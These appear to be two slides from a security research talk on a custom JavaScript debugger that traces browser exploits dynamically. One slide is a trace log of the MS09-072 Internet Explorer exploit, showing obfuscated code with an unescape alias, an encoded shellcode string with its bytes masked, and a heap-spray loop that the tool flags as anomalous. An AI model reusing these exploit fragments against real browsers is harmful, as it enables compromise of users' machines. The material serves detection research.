  • 19. Experiment MS09-072 1: Start Logging On: 2011/05/31 00:18:46 2: Process ID:688 3: MaxDepth 2 4: Process Name:Windows Internet Explorer 5: Filename: 6: Function:JScript - onload function 7: 20:sFsSfxRecSIXauNmBnB() 8: Function:sFsSfxRecSIXauNmBnB 9: DRBfZcPV:Undefined:undefined Payload? 10: AcHKfoIb:Undefined:undefined 14: 6:var DRBfZcPV = unescape 15: DRBfZcPV:Object:{...} 16: 7:var AcHKfoIb = DRBfZcPV('%u350d%ufc03%u747a%u4976%u2593%f9f%' ) 17: AcHKfoIb:String:"*******" 18: 8:var OSGwFEcn = 19: DRBfZcPV( "%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0") 20: OSGwFEcn:String:"**" 21: 9:var pGgrrYDr = 20 + AcHKfoIb.length 22: pGgrrYDr:Number:520 23: 10:while (OSGwFEcn.length < pGgrrYDr) 24: 10:OSGwFEcn +=OSGwFEcn Anomaly loop detected! 25: OSGwFEcn:String:"****" 26: 10:while (OSGwFEcn.length < pGgrrYDr) Malicious code is scanning 27: 10:OSGwFEcn+=OSGwFEcn Memory … 28: OSGwFEcnn:String:"********" 29: 10:while (OSGwFEcn.length < pGgrrYDr) 30: 10:OSGwFEcn+=OSGwFEcn 31: OSGwFEcn:String:"******************" 32: 10:while (OSGwFEcn.length < pGgrrYDr) 33: 10:OSGwFEcn+=OSGwFEcn 34: OSGwFEcn:String:"**********************************"I
  • 20. Conclusion and further works Writing alternative Java Script debugger is exciting challenge! It works partly now. • Java Scripts are everywhere (including Android and Google App Engine) with the pervasive of JSON (RFC 4627) , JQuery (AJAX interface) and so on. • However and further work: there have not been striking probing (debugging) frames for tracing Java Script behavior. • In this paper we exploit the debugger extension of Microsoft Visual Studio 2010 (or later) debugging extension for tracking some famous Java Script exploitation dynamically. Extensibility for other operating systems and platforms • Windows OS is the shortest path to understand Java Script behavior. Windows OS has longer history and therefore more mature interfaces to probe Java Script Execution. Techniques we have obtained here could be applied for constructing probe modules for other systems such as Dalvik VM of Android because the Java Script behavior should be the same regardless of OS (platform) types. IT IS NOT ENOUGH :- Memory dump is necessary, eventually idea: anomaly loop detection of Java Script + active memory monitoring by DLL injection etc.